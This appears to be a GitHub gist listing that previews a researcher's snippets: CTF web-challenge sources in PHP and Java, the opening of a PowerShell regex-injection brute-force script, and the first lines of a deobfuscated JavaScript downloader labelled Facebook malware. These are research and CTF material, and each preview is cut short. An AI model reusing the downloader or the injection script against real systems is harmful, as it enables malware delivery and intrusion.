Skip to content

Instantly share code, notes, and snippets.

View ITAYC0HEN's full-sized avatar

Itay Cohen ITAYC0HEN

View GitHub Profile
@ITAYC0HEN
ITAYC0HEN / index.php
Last active September 4, 2016 18:50
[TWCTF 2016: Web] Global Page
<?php
if (!defined('INCLUDED_INDEX')) {
define('INCLUDED_INDEX', true);
ini_set('display_errors', 1);
include "flag.php";
?>
<!doctype html>
<html>
<head>
<meta charset=utf-8>
@ITAYC0HEN
ITAYC0HEN / User.java
Created August 31, 2016 20:32
[CTF(x) 2016 : WEB] Harambehub – 100 pts
import java.util.ArrayList;
import java.util.List;
/**
* Created by aashish on 8/26/16.
*/
public class User {
static List<User> users = new ArrayList<>();
private String username;
@ITAYC0HEN
ITAYC0HEN / HarambeHub.java
Created August 31, 2016 20:32
[CTF(x) 2016 : WEB] Harambehub – 100 pts
import java.util.ArrayList;
import java.util.List;
import static spark.Spark.*;
/**
* Created by aashish on 8/26/16.
*/
public class HarambeHub {
public static void main(String[] args) {
@ITAYC0HEN
ITAYC0HEN / RegexInjection.ps1
Created August 31, 2016 20:31
[CTF(x) 2016 : WEB] Harambehub – 100 pts
# Written by: Itay Cohen, Aug 2016
$lowercase = [char[]]([int][char]'a'..[int][char]'z')
$uppercase = [char[]]([int][char]'A'..[int][char]'Z')
$numbers = 0..9
$chars = $lowercase+$uppercase+$numbers
function RegexInjection($regex){
foreach($c in $chars)
{
@ITAYC0HEN
ITAYC0HEN / cleanVersion.js
Created June 29, 2016 10:50
Facebook Malware (1st JS file) - June 2016
(function(p)
{
function downloader(url,dest,position)
{
if(!dest || !url)
{return null};
var _httpHandler=WScript.CreateObject("Msxml2.XMLhttp");
_httpHandler.onreadystatechange= function()
{